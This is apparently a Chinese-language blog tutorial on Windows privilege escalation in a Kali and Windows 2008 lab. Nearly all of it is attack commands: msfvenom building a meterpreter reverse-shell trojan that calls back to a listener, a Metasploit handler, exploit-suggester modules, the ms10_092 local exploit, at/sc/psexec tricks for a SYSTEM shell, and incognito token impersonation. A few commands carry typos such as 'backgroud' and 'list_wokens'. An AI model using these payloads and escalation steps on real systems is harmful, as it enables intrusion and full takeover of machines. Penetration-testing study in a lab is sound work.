win提权
提权目的
提高自己的执行权限,已完成更多高权限才拥有的特权
提权常用命令
提权实战
常见的payload利用
KB2592799
KB3000061
KB2592799
1. 安装虚拟机win2008和kali
具体安装步骤详见
https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501
2. 创建普通用户
net user 用户名 密码 /add #创建用户
net user #查看已有用户
3. 切换用户
4. kali生成木马并发送到被攻击服务器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit
具体使用方法详见https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
5. 被攻击方运行生成的木马文件
6. 查看监听是否连接成功并查看权限
7. 查看可利用漏洞
方法一:
run post/multi/recon/local_exploit_suggester #查找可识别的漏洞
方法二:
run post/windows/gather/enum_patches #查找未打补丁的漏洞
方法三:
下载地址:https://github.com/bitsadmin/wesng
8. 尝试利用exp提权
尝试使用此漏洞提权
backgroud #切换到后台
show sessions #查看存在的会话
search ms10_092 #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示设置选项
set LHOST 192.168.0.107
run #运行
》》我这里未成功提升权限,具体步骤为上述步骤
at/sc/ps命令提权
at命令提权
at xx:xx /interactive cmd.exe
sc命令提权
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先创建服务
sc start syscmd #运行服务
ps命令提权
前提条件:需下载PsTools
下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
psexec.exe -accepteula -s -i -d cmd.exe
令牌窃取提权
限制条件:win2008或2003之前版本
use incognito
list_wokens -u
impersonate_token "NT AUTHORITY/SYSTEM" #""中为令牌号